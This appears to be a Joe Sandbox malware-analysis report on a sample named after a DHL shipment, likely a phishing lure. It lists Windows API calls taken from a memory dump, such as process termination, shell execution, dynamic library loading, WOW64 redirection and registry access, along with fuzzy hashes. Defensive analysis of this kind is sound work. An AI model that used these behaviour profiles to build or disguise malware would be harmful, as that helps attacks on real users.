                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0088EB55
                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB64
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB6E
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0088EB75
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 839392675-0
                                                                                            • Opcode ID: 4cafdfdc92ee2ef8e28a4a2baf0ded3777bb1fc938e33b7bc249d22e959e5467
                                                                                            • Instruction ID: 8f7c097e189b62b045c58b611461e93eca7814aa85447e3519cdd6827ae71914
                                                                                            • Opcode Fuzzy Hash: 4cafdfdc92ee2ef8e28a4a2baf0ded3777bb1fc938e33b7bc249d22e959e5467
                                                                                            • Instruction Fuzzy Hash: BCF01772240158BBE6215B629C0EEEB7B7CFBCBB11F000269FA11E1191A6A05A0186B5
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?), ref: 00877452
                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00877469
                                                                                            • GetWindowDC.USER32(?), ref: 00877475
                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00877484
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00877496
                                                                                            • GetSysColor.USER32(00000005), ref: 008774B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                            • String ID:
                                                                                            • API String ID: 272304278-0
                                                                                            • Opcode ID: 7aacc2dca4cfe15daccdfeca4a7b507fa30a7b9e29f577bcf1a5b0a8c9923392
                                                                                            • Instruction ID: 6cac793bd4000f6d131ed6bf719b371d673d1d95e8162072d32d71e6f68f849d
                                                                                            • Opcode Fuzzy Hash: 7aacc2dca4cfe15daccdfeca4a7b507fa30a7b9e29f577bcf1a5b0a8c9923392
                                                                                            • Instruction Fuzzy Hash: 89014B31400219EFDB515F64DC08FAA7BB5FB04315F514264FA19A21A1CB315E51EB50
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0088187F
                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0088188B
                                                                                            • CloseHandle.KERNEL32(?), ref: 00881894
                                                                                            • CloseHandle.KERNEL32(?), ref: 0088189C
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008818A5
                                                                                            • HeapFree.KERNEL32(00000000), ref: 008818AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                            • String ID:
                                                                                            • API String ID: 146765662-0
                                                                                            • Opcode ID: c1d0dda42be1e202b89db95ea7d9e018747eb0d5bcee55d27c9ae3819ca45ae7
                                                                                            • Instruction ID: ded2cdadd5451f97da8a292d4e79c36f6238d6ec96ab62a2126c4aad648fb3c2
                                                                                            • Opcode Fuzzy Hash: c1d0dda42be1e202b89db95ea7d9e018747eb0d5bcee55d27c9ae3819ca45ae7
                                                                                            • Instruction Fuzzy Hash: A9E0E576004101BBDB015FA9ED0C90AFF79FF49B22B508321F22591170CB329420DF60
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0088C6EE
                                                                                            • _wcslen.LIBCMT ref: 0088C735
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0088C79C
                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0088C7CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                            • String ID: 0
                                                                                            • API String ID: 1227352736-4108050209
                                                                                            • Opcode ID: db71313d762807a674420c52c5b188dc06a7d8d34c03236f352e077794a8caf1
                                                                                            • Instruction ID: 6cf86d6b907520d2f0a32eab484ac535b95ac772b964c6428cc6933facf56f1e
                                                                                            • Opcode Fuzzy Hash: db71313d762807a674420c52c5b188dc06a7d8d34c03236f352e077794a8caf1
                                                                                            • Instruction Fuzzy Hash: B051CE716143019BD724FF2CC885A6B77E8FF99314F040A2DFA95D31A9EB70D9048BA2
                                                                                            APIs
                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 008AAEA3
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                            • GetProcessId.KERNEL32(00000000), ref: 008AAF38
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AAF67
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                            • String ID: <$@
                                                                                            • API String ID: 146682121-1426351568
                                                                                            • Opcode ID: eaf4b1943bfbc9aaae6c954473344fc6345d9abc04cbe962142a4499c1bf2337
                                                                                            • Instruction ID: cab932fe531ee9f74e33c9a75e33bcbc1f41299ee897e1b082d982f70c18c763
                                                                                            • Opcode Fuzzy Hash: eaf4b1943bfbc9aaae6c954473344fc6345d9abc04cbe962142a4499c1bf2337
                                                                                            • Instruction Fuzzy Hash: D0716A70A00219DFDB18DF58D484A9EBBF0FF09310F048499E856ABB52CB74ED81CB92
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00887206
                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0088723C
                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0088724D
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008872CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                            • String ID: DllGetClassObject
                                                                                            • API String ID: 753597075-1075368562
                                                                                            • Opcode ID: 306a00885446eef4dc1f051c14614783e20363ea8bb9ebc5abd506c4415613bb
                                                                                            • Instruction ID: aef0593f6160376237d1ea6d4e88ccf0b5f588515e41a7b10fe8545d45fc5e84
                                                                                            • Opcode Fuzzy Hash: 306a00885446eef4dc1f051c14614783e20363ea8bb9ebc5abd506c4415613bb
                                                                                            • Instruction Fuzzy Hash: D3416F71A04208EFDB15DF54C884A9A7BB9FF45314F2480A9BD0AEF21AD7B1D944CBA0
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008B3E35
                                                                                            • IsMenu.USER32(?), ref: 008B3E4A
                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008B3E92
                                                                                            • DrawMenuBar.USER32 ref: 008B3EA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                            • String ID: 0
                                                                                            • API String ID: 3076010158-4108050209
                                                                                            • Opcode ID: 7e24f3124adb3013733216f5866f1e326096ddbd97ef5a5ccf768261af2a3c8a
                                                                                            • Instruction ID: 0c4747cff6b06d4bb70f25580ed1e2067a4f494d44723cb0762a8ab669449af4
                                                                                            • Opcode Fuzzy Hash: 7e24f3124adb3013733216f5866f1e326096ddbd97ef5a5ccf768261af2a3c8a
                                                                                            • Instruction Fuzzy Hash: 5C411275A01209EFDB20DF64D884AEABBB9FF49354F04412AE905AB750D730EE44CBA0
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00881E66
                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00881E79
                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00881EA9
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 2081771294-1403004172
                                                                                            • Opcode ID: 91a166b0f60bb0462a09fa7ecd6c1a47ebce36fd3de0a262174c47460aab8f4e
                                                                                            • Instruction ID: b923767e4dc4b9866d1989a722571c8ab2270e6633a7fedfacaf1fae144e57fa
                                                                                            • Opcode Fuzzy Hash: 91a166b0f60bb0462a09fa7ecd6c1a47ebce36fd3de0a262174c47460aab8f4e
                                                                                            • Instruction Fuzzy Hash: C421E471A00108ABDB14AB68EC49CFFB7ADFF56364B144129F825E72E1DB7449468720
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008B2F8D
                                                                                            • LoadLibraryW.KERNEL32(?), ref: 008B2F94
                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008B2FA9
                                                                                            • DestroyWindow.USER32(?), ref: 008B2FB1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                            • String ID: SysAnimate32
                                                                                            • API String ID: 3529120543-1011021900
                                                                                            • Opcode ID: cee7518ad3997fc7ead7081c87ca554b09a310851fb3de4dcfd9252846f015fd
                                                                                            • Instruction ID: 66cf679f4554ecb5ffa9b38953055e9d2fa1b377b8c6761ffa55b42727eb1a0b
                                                                                            • Opcode Fuzzy Hash: cee7518ad3997fc7ead7081c87ca554b09a310851fb3de4dcfd9252846f015fd
                                                                                            • Instruction Fuzzy Hash: F4218C71214209ABEF205F64DC84EFB77B9FB59364F104628F950D6390DB71DC919760
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00844D1E,008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002), ref: 00844D8D
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00844DA0
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00844D1E,008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000), ref: 00844DC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: d2e37efcd2959def67e4a404c899bf4ddc21380f12510dd7d169e14002ae1179
• Instruction ID: 16ba808345e2b026fbbcc3ff8cb0fa9611cd5a3cc50713f0224b85f209e01df6
• Opcode Fuzzy Hash: d2e37efcd2959def67e4a404c899bf4ddc21380f12510dd7d169e14002ae1179
• Instruction Fuzzy Hash: 44F04935A4021CFBDB159F94DC49BAEBBB9FF44752F0001A8F90AE2260CB759A44DE91
APIs
• LoadLibraryA.KERNEL32 ref: 0087D3AD
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087D3BF
• FreeLibrary.KERNEL32(00000000), ref: 0087D3E5
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 145871493-2590602151
• Opcode ID: 8bf23a61de33eda616b5953dc36c4d9b482dc7977c7208d5f34d718eecb07786
• Instruction ID: d1498792d1bc33bef72434598a940278fbacf075252e1770b5c1f32b1c0778fb
• Opcode Fuzzy Hash: 8bf23a61de33eda616b5953dc36c4d9b482dc7977c7208d5f34d718eecb07786
• Instruction Fuzzy Hash: 3FF05531801B248BC77057148C5896E7334FF21B05F55C254FA0EF636EEB60DC4686D2
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00824EAE
• FreeLibrary.KERNEL32(00000000,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EC0
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 145871493-3689287502
• Opcode ID: 8b8c062ce5670ab6e550b0defb20f9f35353110698825672767725ec3d893c3a
• Instruction ID: 397285f2be94e52c3d7f64a0fb161be155f0e910b48e361d9c42a0d9a9736ca8
• Opcode Fuzzy Hash: 8b8c062ce5670ab6e550b0defb20f9f35353110698825672767725ec3d893c3a
• Instruction Fuzzy Hash: 58E08639A016325BA2311B29BC18A5F7658FF81F727060215FC10E2300DBA4CD4240B0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E62
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00824E74
• FreeLibrary.KERNEL32(00000000,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E87
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 145871493-1355242751
• Opcode ID: 5e24a078feaa7a1b9025964266ddc51f73bd1138c436d6d7243d1675dbd04a12
• Instruction ID: 5eb56b319fb2637dcc527cde878c5dc768dc815edbb32ef02f9397cda878414b
• Opcode Fuzzy Hash: 5e24a078feaa7a1b9025964266ddc51f73bd1138c436d6d7243d1675dbd04a12
• Instruction Fuzzy Hash: E9D01239502632576A221B297C1CD8F7B18FF85B713460615F915F6224CF64CD4285F0
APIs
• GetCurrentProcessId.KERNEL32 ref: 008AA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008AA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 008AA468
• CloseHandle.KERNEL32(?), ref: 008AA63D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 314320a4471ea8d7571573bc8079009ea88033ccd8bd7384f7f8704fbdec63e2
• Instruction ID: cd8e5de334048449d0dd3a4f8c1330061d3f9924ef554ee72d65ae551a2f97a2
• Opcode Fuzzy Hash: 314320a4471ea8d7571573bc8079009ea88033ccd8bd7384f7f8704fbdec63e2
• Instruction Fuzzy Hash: 9FA17C716043009FE724DF28D886B2AB7E5FB88714F14881DF55ADB692DBB0EC41CB92
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008C3700), ref: 0085BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,008F121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0085BC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,008F1270,000000FF,?,0000003F,00000000,?), ref: 0085BC36
• _free.LIBCMT ref: 0085BB7F
  • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
  • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
• _free.LIBCMT ref: 0085BD4B
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
• Opcode ID: 9b1cb538e450f263edafb964faee35be8aae5feb6df0cace06c9f9a446437d9d
• Instruction ID: f5c42dc3c16121aae2107dbdd85d853d11f76c51281b0da2d5630aaac5b173a0
• Opcode Fuzzy Hash: 9b1cb538e450f263edafb964faee35be8aae5feb6df0cace06c9f9a446437d9d
• Instruction Fuzzy Hash: 93510971900209EFCB10DFB99C85DBEB7B8FF51362B10026AE950E7291EB709D49CB51
APIs
  • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0088CF22,?), ref: 0088DDFD
  • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0088CF22,?), ref: 0088DE16
  • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
• lstrcmpiW.KERNEL32(?,?), ref: 0088E473
• MoveFileW.KERNEL32(?,?), ref: 0088E4AC
• _wcslen.LIBCMT ref: 0088E5EB
• _wcslen.LIBCMT ref: 0088E603
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0088E650
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 060d70ac2dfab1f86d143cfe4f0f667c5753c4b0b82c6980f3ece26fdd790d14
• Instruction ID: 549350bd5d2bb0c02802f1002ea2551504f0e39fe75946cf236073528f7b6444
• Opcode Fuzzy Hash: 060d70ac2dfab1f86d143cfe4f0f667c5753c4b0b82c6980f3ece26fdd790d14
• Instruction Fuzzy Hash: 1D512EB24087455BC724EBA4D8819DFB7ECFF94340F00492EE589D3191EF74A688876B
APIs
  • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
  • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
  • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
  • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
  • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008ABAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008ABB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008ABB63
• RegCloseKey.ADVAPI32(?,?), ref: 008ABBA6
• RegCloseKey.ADVAPI32(00000000), ref: 008ABBB3
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: 336185b373edc91950499ffc2a404b4b1a9c7f207f45f41c2554d80d9dea180c
• Instruction ID: 7d270c499ad617a25aae72b14057f6a4ec6c0aa20bc3ef361e66fbc216eb71cb
• Opcode Fuzzy Hash: 336185b373edc91950499ffc2a404b4b1a9c7f207f45f41c2554d80d9dea180c
• Instruction Fuzzy Hash: 8061A031208245EFD314DF24C490E2ABBE5FF85318F54856CF4998B6A2DB31ED46CBA2
APIs
• VariantInit.OLEAUT32(?), ref: 00888BCD
• VariantClear.OLEAUT32 ref: 00888C3E
• VariantClear.OLEAUT32 ref: 00888C9D
• VariantClear.OLEAUT32(?), ref: 00888D10
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00888D3B
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 89abc530be6b1e4b07761088793ed891c362a499ee95bf8994c39e34ddc7fafe
• Instruction ID: ece6abb752760c21f44c72fa94b2e9a26f1e849b4f80bb5ab07c465259b37425
• Opcode Fuzzy Hash: 89abc530be6b1e4b07761088793ed891c362a499ee95bf8994c39e34ddc7fafe
• Instruction Fuzzy Hash: 735179B5A00219EFCB10DF68C894AAABBF9FF89314B158559F909DB354E730E911CF90
                                                                                            APIs
                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00898BAE
                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00898BDA
                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00898C32
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00898C57
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00898C5F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                            • String ID:
                                                                                            • API String ID: 2832842796-0
                                                                                            • Opcode ID: 1a823c62acae3d05c1cb20ab903e8dd34ddb9dd5e7fbbc37852df5d76e17519a
                                                                                            • Instruction ID: dd3512891b36f28875721f527cced3719384b0106add3a92bff4c01f276db436
                                                                                            • Opcode Fuzzy Hash: 1a823c62acae3d05c1cb20ab903e8dd34ddb9dd5e7fbbc37852df5d76e17519a
                                                                                            • Instruction Fuzzy Hash: 6E513835A00219DFCB05EF69C881A69BBF5FF49314F088458E849AB362DB35ED51CB91
                                                                                            APIs
